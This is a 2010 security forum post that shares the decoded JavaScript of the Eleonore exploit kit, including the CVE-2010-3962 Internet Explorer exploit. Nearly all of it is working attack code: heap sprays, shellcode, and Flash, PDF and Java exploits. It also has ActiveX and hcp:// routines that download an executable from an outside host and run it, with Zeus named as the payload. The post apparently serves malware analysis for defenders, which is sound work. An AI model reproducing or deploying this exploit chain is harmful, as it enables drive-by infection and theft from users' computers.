Author Topic: 0day exploit CVE-2010-3962 in Eleonore exploits pack  (Read 5408 times)

0 Members and 1 Guest are viewing this topic.

November 07, 2010, 06:30:50 pm
Read 5408 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
source: hxxp://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr

payload is Zeus : hxxp://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?s=mdac

http://www.virustotal.com/file-scan/report.html?id=4f43599e52f023ab53047979c406f3bfe02665f0b7cd58b358668a72540c70c7-1289154547
http://camas.comodo.com/cgi-bin/submit?file=4f43599e52f023ab53047979c406f3bfe02665f0b7cd58b358668a72540c70c7


decoded javascript
Code: [Select]
document.write("<body><div id=\"j\"></div><OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT></body>");
    var fdata;
    var skd = "%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070";
     var skd1 = skd + "%u7468%u7074%u2F3A%u692F%u6470%u736E%u656A%u722E%u2F75%u6B6B%u6D33%u7368%u6D68%u467A%u546C%u5A46%u6345%u3572%u586A%u7337%u4145%u4C41%u6B39%u4E67%u725A%u733F%u463D%u616C%u6873%u3031%u0000";

    function LOADFLASH() {
        var vid = "<object width=\"300\" height=\"300\" id=\"BridgeMovie\"><param name=\"movie\" value=\"baner.swf\"></param><param name=\"allowScriptAccess\" value=\"sameDomain\"></param><embed src=\"baner.swf\" name=\"BridgeMovie\" allowScriptAccess=\"sameDomain\" type=\"application/x-shockwave-flash\" width=\"425\" height=\"355\"></embed></object>";

        function lev(id, eddc) {
            document.getElementById(id).innerHTML = fev(eddc);
        }


        function fev(edc) {
            if (edc && edc.toLowerCase().indexOf("classid") == -1) {
                var objPos = edc.toLowerCase().indexOf("object ") + "object ".length;
                return edc.substr(0, objPos) + ("classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" " + edc.substr(objPos));
            } else {
                return edc;
            }
        }

        lev("j", vid);
    }


    function FLASHSPRAY() {
        var movie = (navigator.appName.indexOf("Microsoft") != -1 ? window : document).BridgeMovie;
        movie.sendFromJS(fdata);
    }


    function GFLASH() {
        try {
            var thesame1 = "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FADA171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB6016B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF35BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E296581EC000900006081EC00090000EB6E33C0648B403085C0780D568B400C8B701CAD8B40085EC38B403483C07C8B403CC3608B6C24248B453C8B7C057803FD8B4F188B5F2003DDE333498B348B03F533C099FCAC84C07407C1CA0D03D0EBF43B54242875E28B5F2403DD668B0C4B8B5F1C03DD8B048B03C58944241C61C3EB52AD5052E8A9FFFFFF890783C40883C7043BF175ECC38E4E0EECA517017C1F790AE8FB97FD0F72FEB3167ED8E2732944E85749ED0F7E8B4BE35F5E83EC7C8BECE84CFFFFFF8BD0EB02EB05E8F9FFFFFF58EB02EB668D7D40A4807EFFFF75F94FF6178BF083EE3AFE4E068D7D048BCE83C118E88AFFFFFF83C10CB8016E6574C1F808506877696E698BDC515253FF55045A598BD0E868FFFFFF33C05050505050FF551C89453433C0505050508D5D4053FF7534FF5520894538EB02EB7333C0B0655068612E657889653033C050B08250B0025032C05050B040C1E01850FF7530FF550889453C33C066B80C012BE08BF48D5E045366B80401508D460850FF7538FF55248B460485C0741633C0508D460450FF76048D460850FF753CFF550CEBD0FF753CFF551033C066B80C0103E0EB02EB3633C9B1542BE18BFC33C0F3AA8BFCC607448D77445657505050505050FF753050FF551481C4E00900006181C400090000FF71ECC20400E8CDFEFFFF687474703A2F2F6970646E736A652E72752F6B6B336D6873686D7A466C54465A456372356A5837734541414C396B674E5A723F733D466C6173683900EB4935FCF43A3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D5549494D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F7354416728951B4BACD4E7019CADC394A81";
            var thesame2 = "0082000000000000000000000000000000000000000000000000000000000000000002043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F4576656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B07010207020407040607050807050907060B07020C07020D07020E07020F04000000000000000000000000000000000001010208030002010301000100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D049005D04240060034F0402470000030201010927F";
            var thesame3 = "20202020202020202020202020202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65775F666C612E4D61696E54696D656C696E6500";
            sv = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version");
            if (sv == "WIN 9,0,115,0" ||
                sv == "WIN 9,0,16,0" ||
                sv == "WIN 9,0,28,0" ||
                sv == "WIN 9,0,45,0" ||
                sv == "WIN 9,0,47,0" || sv == "WIN 9,0,64,0") {
                if (sv == "WIN 9,0,115,0") {
                    fdata = thesame1 + ("599B48EA" + thesame2 + "86279F86275F8E82AFBFFFF00F82902F863790" + thesame3 + "4000000073656F6920646B6C206A6866776C69337974726F262A262A28262A28265E2423252423252423255E2A2628292A2829295F2A295F282A285E2A2678766E62786E6276207664356735683435643620323178357A7838676673203431763578676667660000");
                }
                if (sv == "WIN 9,0,16,0") {
                    fdata = thesame1 + ("5E8BC8AA" + thesame2 + "C6275FC6271FCE82AFBFFFF00FC2902FC63750" + thesame3 + "4000000040235E2425262A295F206A68616764206877697472206A686667776F7472206F627366206A6735333436383433353435363438367366206A62666D206273666A736766206B757967667A7862636B61736A68667039717738207061206473686766310000");
                }
                if (sv == "WIN 9,0,28,0") {
                    fdata = thesame1 + ("5D1DE8AA" + thesame2 + "86275F86271F8E82AFBFFFF00F82902F863750" + thesame3 + "400000007A6A73206A687366206B2A2A265E2524232423255E23252A282829262829265E2A265E23252423255E255E262A262A262A2828295F2929282A285E2A26255E2425242521407E217E2423405E255E2A265E2A28262A28295E2A265E24255E242325240100");
                }
                if (sv == "WIN 9,0,45,0") {
                    fdata = thesame1 + ("5A6E18AA" + thesame2 + "56275F56271F5E82AFBFFFF00F52902F563750" + thesame3 + "400000002324265E2A282A2829295F295F28295F2A2829265E2A28265E24255459544A484746484755495E45255E252A2628295F68675A4A6820677A687367206A6867662068676820647566207739206B65272067705B6E686464686773786A68636B6A6C380000");
                }
                if (sv == "WIN 9,0,47,0") {
                    fdata = thesame1 + ("5A6E18AA" + thesame2 + "56275F56271F5E82AFBFFFF00F52902F563750" + thesame3 + "400000005E265E262A262829295F2B5F2B2123407E21407E21402423405E24252A282928295F28295F5F2A285E2A595425592A2628295F2B5F5F2B08085F2B5F295F2A265E2A2648474648474B6A6B6A7A6866206B6A736661736766206766676667676771710000");
                }
                if (sv == "WIN 9,0,64,0") {
                    fdata = thesame1 + ("5EAAE8EA" + thesame2 + "56279F56275F5E82AFBFFFF00F52902F563790" + thesame3 + "000000007E4023232526285F292B5F28295F2A2A255E252B4A494F4B484748474654524545434254254547464E47595E5E613977726F396A682064666874393820646667206B646C6F6620796B6C7A736867636173777478666B6A6B666866683535353432310000");
                }
                LOADFLASH();
            } else {
 setTimeout("FLASH10()", 8000);
                PDF();
            }
        } catch (e) {
 setTimeout("FLASH10()", 8000);
            PDF();
        }
    }


    function SHOWPDF(fn) {
        var p = document.createElement("iframe");
        p.setAttribute("src", fn);
        p.setAttribute("width", 10);
        p.setAttribute("height", 10);
        p.setAttribute("frameborder", "0");
        document.body.appendChild(p);
    }
        function addp1(src) {window.location=src;}


    function PDF() {
        try {
            var lv = Pdf1.GetVersions();
            var fi = /EScript=([^,]+),/;
            var fif = /AcroForm=([^,]+),/;
            lvf = lv.match(fif)[1].split(".");
            lv = lv.match(fi)[1].split(".");
            sv = parseInt(lv[0]);
            lv = parseInt(lv.join(""));
            lvf = parseInt(lvf.join(""));
if (lv > 600 && lv < 910) { SHOWPDF("http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?p&x=i"+lv+"&"); } else { addp1("http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?pp&x=i"+lv+"&"); }
        } catch (e) {
        }
    }


    function FLASH10() {
        try {
            svn = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version");
            if (svn == "WIN 10,0,12,36" ||
                svn == "WIN 10,0,22,87" ||
                svn == "WIN 9,0,124,0" ||
                svn == "WIN 9,0,151,0" || svn == "WIN 9,0,159,0") {
                var memory;
                var nop = unescape("%u0808%u0808");
                var SC = unescape(skd1);
                while (nop.length <= 32768) {
                    nop += nop;
                }
                nop = nop.substring(0, 32768 - SC.length);
                memory = new Array;
                for (ass8995 = 0; ass8995 < 4608; ass8995++) {
                    memory[ass8995] = nop + SC;
                }
                fdata = "46575309600400007800055F00000FA000000C01004411080000004302FFFFFFBF150B00000001005363656E6520310000FF145800000001006FF39005FCE4010060003E80003E80010100FFFFFFFF0164000000FFFFFFFF11358D56D57D16DA493100344C5FFDB76E51725C9FBCE7AB32802672472E5A125B6D9E00286780049525A1254900067E80019EB6D25000FF091000000002000100860606010001000040000000BF061200000026010002001C8CA1770062616C6C5F6D6300BF148A030000010000000010002E00000000230004766F69640C666C6173682E6576656E74730A4D6F7573654576656E740442616C6C0D666C6173682E646973706C6179094D6F766965436C69700C636C69636B48616E646C65720F6D6F75736555704C697374656E6572116D6F757365446F776E4C697374656E657205747261636521687474703A2F2F61646F62652E636F6D2F4153332F323030362F6275696C74696E17666C6173682E646973706C61793A4D6F766965436C697014666C6173682E646973706C61793A53707269746524666C6173682E646973706C61793A446973706C61794F626A656374436F6E7461696E45721F666C6173682E646973706C61793A496E7465726163746976654F626A6563741B666C6173682E646973706C61793A446973706C61794F626A6563741C666C6173682E6576656E74733A4576656E7444697370617463686572064F626A6563740E62616C6C20637265617465643A20046E616D650A627574746F6E4D6F646505434C49434B106164644576656E744C697374656E65720A4D4F5553455F444F574E084D4F5553455F555014596F7520636C69636B6564207468652062616C6C097374617274447261670873746F70447261670F4576656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973706C61794F626A656374436F6E7461696E657206537072697465111601160316061805050017010500080C1A051A0D1A0E1A0F1A101A111A121A13040E050701060804090A0B0C0D0E0F100F050701060804090A0B0C0D0E0F10020507010608031C07010207020407010507030707050807060907060A090B01091501091601090402091701090801091801091901090A01091A01090901091C01091D0107011307021E07031F0703200703210703220907030600000000000000000101020000010102000001010200000000000000010304090400010305010002060100040701000300000105010304010006000101090A03D0304700000103010A0B33D030D049005D082C14D06609A04F0801D026680AD0600B660C600D4F0E02D0600B660F60104F0E02D0600B661160124F0E024700000202020A0B0AD0305D082C1B4F08014700000301020A0B07D030D04F13004700000401020A0B07D030D04F1400470000050201010927258110258141A2306001020202020202020202020202020202020202020202020202020202024700003F13090000000100020042616C6C0040000000";
                LOADFLASH();
            }
        } catch (e) {
        }
    }



var doa="a";
 function java_zdt() {   
        try {
           var u = "http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?s=sambanew& -J-jar -J\\\\194.8.251.176\\public\\data.jpg none";
             if (window.navigator[doa+"ppName"] == "Microsoft Internet Explorer") {
                try {
                    var o = document.createElement("OB"+"JE"+""+"CT");
                   o.classid = "cl"+"s"+""+"id:CAF"+""+"EEF"+""+"AC-DE"+""+"C7-00"+"00-00"+""+"00-ABC"+""+"DE"+""+"FFED"+""+"CBA";
                    o["l"+""+doa+""+"u"+""+"n"+""+"c"+""+"h"](u);
                } catch (e) {   
try {
                  var o2 = document.createElement("OB"+""+"JE"+""+"CT");
                    o2.classid = "cls"+"id:8A"+""+"D9C840-04"+""+"4E-11D1-B3"+""+"E9-008"+"05F"+""+"499"+"D93";
                    o2["l"+""+doa+"u"+""+"n"+"c"+""+"h"](u); } catch (e) {java_nop() ; }
                }
            } else {
                var o = document.createElement("O"+""+"BJ"+"EC"+""+"T");
                var n = document.createElement("O"+""+"BJ"+"EC"+""+"T");
                o.type = ""+doa+"pplicati"+""+"on/np"+""+"run"+"time-script"+""+"able-plu"+""+"gin;de"+"ploy"+""+"me"+""+"ntto"+""+"olkit";
                n.type = ""+doa+"pplica"+""+"tion/ja"+""+"va-dep"+""+"lo"+"ym"+""+"ent-too"+""+"lk"+"it";
                document.body.appendChild(o);
                document.body.appendChild(n);
                try {
                    o["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);
                } catch (e) {try {

                    n["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);
} catch (e) {java_nop() ; }
                }
            }
        } catch (e) {
java_nop() ;
        }
    }

 function java_nop() {
 try {
             if (window.navigator[doa+"ppName"] == "Microsoft Internet Explorer") {               
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
oSpan.innerHTML = '<object id="" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"><PARAM name="launchjnlp" value="-J-jar -J\\\\194.8.251.176\\public\\data.jpg none"><PARAM name="docbase" value="http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?s=samba2&"></object>';
            } else {
               
var o = document.createElement("OBJECT");                   
o.setAttribute("type", "application/x-java-applet");
o.setAttribute("launchjnlp", "-J-jar -J\\\\194.8.251.176\\public\\data.jpg none");
o.setAttribute("docbase", "http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?s=samba2&");
document.body.appendChild(o);

            }
        } catch (e) {
        }

    }

    if(doa=="a") java_zdt();
if (window.navigator.javaEnabled()) {document.write("<applet code=\"a02cca0dac6.class\" archive=\"menu.zip\" width=\"146\" height=\"134\"><param name=\"user\" VALUE=\"iNN/%wwr/bDFnPE1xw88kUiFiUWeqheo-G1RnKfF-==lu86.o1BF9gTK:7\"></applet>");}
   
var v9RU8uUQXPzukhnqFGf='http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr?s=mdac';
function vSri9tABI5EiuM0PU4t(AV1lBTVbY4XFoTj94Nf,Cklwptw4ewlB0HBvSeR){
var SbIuW4cJurZZl3RTAKe=null;
try{SbIuW4cJurZZl3RTAKe=AV1lBTVbY4XFoTj94Nf.CreateObject(Cklwptw4ewlB0HBvSeR)}catch(e){}
if(!SbIuW4cJurZZl3RTAKe){try{SbIuW4cJurZZl3RTAKe=AV1lBTVbY4XFoTj94Nf.CreateObject(Cklwptw4ewlB0HBvSeR,"")}catch(e){}}
if(!SbIuW4cJurZZl3RTAKe){try{SbIuW4cJurZZl3RTAKe=AV1lBTVbY4XFoTj94Nf.CreateObject(Cklwptw4ewlB0HBvSeR,"","")}catch(e){}}
if(!SbIuW4cJurZZl3RTAKe){try{SbIuW4cJurZZl3RTAKe=AV1lBTVbY4XFoTj94Nf.GetObject("",Cklwptw4ewlB0HBvSeR)}catch(e){}}
if(!SbIuW4cJurZZl3RTAKe){try{SbIuW4cJurZZl3RTAKe=AV1lBTVbY4XFoTj94Nf.GetObject(Cklwptw4ewlB0HBvSeR,"")}catch(e){}}
if(!SbIuW4cJurZZl3RTAKe){try{SbIuW4cJurZZl3RTAKe=AV1lBTVbY4XFoTj94Nf.GetObject(Cklwptw4ewlB0HBvSeR)}catch(e){}}
return(SbIuW4cJurZZl3RTAKe);
}
function AdiaLdxU3RYwMAFHgIt(KDUaSI5BR8Y88Jt59m2){
QRxxc8Fn3hSTlfyM8HQ="updates.exe";var CCkamWcEznZd0CMjY1h=KDUaSI5BR8Y88Jt59m2.CreateObject("Scripting.FileSystemObject","");
var sap=vSri9tABI5EiuM0PU4t(KDUaSI5BR8Y88Jt59m2,"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on");
var TjYrqfBkkJXlVyiTaqj=vSri9tABI5EiuM0PU4t(KDUaSI5BR8Y88Jt59m2,"ADODB.Stream");
var n39bzVmEmTXfTkQ5Xwg=null;QRxxc8Fn3hSTlfyM8HQ=CCkamWcEznZd0CMjY1h.BuildPath(CCkamWcEznZd0CMjY1h.GetSpecialFolder(2),QRxxc8Fn3hSTlfyM8HQ);TjYrqfBkkJXlVyiTaqj.Mode=3;
try{n39bzVmEmTXfTkQ5Xwg=vSri9tABI5EiuM0PU4t(KDUaSI5BR8Y88Jt59m2,"Mic"+"ro"+"so"+"ft.XM"+"LH"+"T"+"TP");n39bzVmEmTXfTkQ5Xwg.open("G"+"ET",v9RU8uUQXPzukhnqFGf,false);}
catch(e){try{n39bzVmEmTXfTkQ5Xwg=vSri9tABI5EiuM0PU4t(KDUaSI5BR8Y88Jt59m2,"MSX"+"M"+"L2.XML"+"HT"+"TP");n39bzVmEmTXfTkQ5Xwg.open("GE"+"T",v9RU8uUQXPzukhnqFGf,false);}
catch(e){try{n39bzVmEmTXfTkQ5Xwg=vSri9tABI5EiuM0PU4t(KDUaSI5BR8Y88Jt59m2,"M"+"SX"+"ML2.Se"+"rv"+"erX"+"MLHT"+"TP");n39bzVmEmTXfTkQ5Xwg.open("GET",v9RU8uUQXPzukhnqFGf,false);}
catch(e)
{
try
{
n39bzVmEmTXfTkQ5Xwg=new XMLHttpRequest();
n39bzVmEmTXfTkQ5Xwg.open("GET",v9RU8uUQXPzukhnqFGf,false);
}
catch(e){return 0;}}}}
TjYrqfBkkJXlVyiTaqj.Type=1;n39bzVmEmTXfTkQ5Xwg.send(null);rb=n39bzVmEmTXfTkQ5Xwg.responseBody;TjYrqfBkkJXlVyiTaqj.Open();TjYrqfBkkJXlVyiTaqj.Write(rb);TjYrqfBkkJXlVyiTaqj.SaveTofile(QRxxc8Fn3hSTlfyM8HQ,2);sap.ShellExecute(QRxxc8Fn3hSTlfyM8HQ);
return 1;
}
function LvUKZdXwN6w59zDkziW(){
var wsQpMBVLXccyvLWnCBy=0;
var LvUKZdXwN6w59zDkziWd=new Array('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
while(LvUKZdXwN6w59zDkziWd[wsQpMBVLXccyvLWnCBy])
{
var KDUaSI5BR8Y88Jt59m2=null;
KDUaSI5BR8Y88Jt59m2=document.createElement("object");
KDUaSI5BR8Y88Jt59m2.setAttribute("classid","clsid:"+LvUKZdXwN6w59zDkziWd[wsQpMBVLXccyvLWnCBy]);
if(KDUaSI5BR8Y88Jt59m2){try{var swIThoRQI3G2P0SFWek=vSri9tABI5EiuM0PU4t(KDUaSI5BR8Y88Jt59m2,"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on");
if(swIThoRQI3G2P0SFWek){if(AdiaLdxU3RYwMAFHgIt(KDUaSI5BR8Y88Jt59m2))return 1;}}catch(e){}}
wsQpMBVLXccyvLWnCBy++;
}
}
LvUKZdXwN6w59zDkziW();


       
function alloc(bytes, mystr) {
var shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090"+"%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u656A%u722E%u2F75%u6B6B%u6D33%u7368%u6D68%u467A%u546C%u5A46%u6345%u3572%u586A%u7337%u4145%u4C41%u6B39%u4E67%u725A%u733F%u6F3D%u6164%u5F79%u3332%u3133%u3032%u9000");
while (mystr.length< bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2) + shellcode;
}

var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
FAKEOBJ = alloc(233120, FAKEOBJ);
for (var k = 0; k < 1000; k++) {
    evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write("<table style=position:absolute;clip:rect(0)>");
var p = document.createElement("iframe");
        p.setAttribute("src", "hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522cmd /c cd ../ @@ echo var a-ActiveXObject;var b-new a(WScript.Arguments(0));b.Open(WScript.Arguments(1),WScript.Arguments(2),WScript.Arguments(3));b.Send(WScript.Arguments(4));var c-b.responseBody;var d-new a(WScript.Arguments(5));d.Type-WScript.Arguments(6);d.Mode-WScript.Arguments(7);d.Open();d.Write(c);var e-WScript.Arguments(8);d.SaveToFile(e,2);var f-new a(WScript.Arguments(9)).Run(e,WScript.Arguments(10)); > exe.js @@ CScript.exe exe.js //b //s _Microsoft.XMLHTTP_ _GET_ _http://ipdnsje.ru/kk3mhshmzFlTFZEcr5jX7sEAAL9kgNZr__s-hcp_ _false_ _null_ _ADODB.Stream_ 1 3 _exe.exe_ _WScript.Shell_ 0 @@ del /f /q exe.js @@ taskkill /im /f HelpCtr.exe%2522.replace(/__/g,String.fromCharCode(63)).replace(/@/g,String.fromCharCode(38)).replace(/_/g,String.fromCharCode(34)).replace(/-/g,String.fromCharCode(61))%2529%27%29%29%3C/script%3E");
        p.setAttribute("width", 55);
        p.setAttribute("height", 55);
        p.setAttribute("frameborder", "0");
        document.body.appendChild(p); GFLASH();

Here is the exploit code
Code: [Select]
function alloc(bytes, mystr) {
var shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090"+"%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u656A%u722E%u2F75%u6B6B%u6D33%u7368%u6D68%u467A%u546C%u5A46%u6345%u3572%u586A%u7337%u4145%u4C41%u6B39%u4E67%u725A%u733F%u6F3D%u6164%u5F79%u3332%u3133%u3032%u9000");
while (mystr.length< bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2) + shellcode;
}

var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
FAKEOBJ = alloc(233120, FAKEOBJ);
for (var k = 0; k < 1000; k++) {
    evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write("<table style=position:absolute;clip:rect(0)>");
Ruining the bad guy's day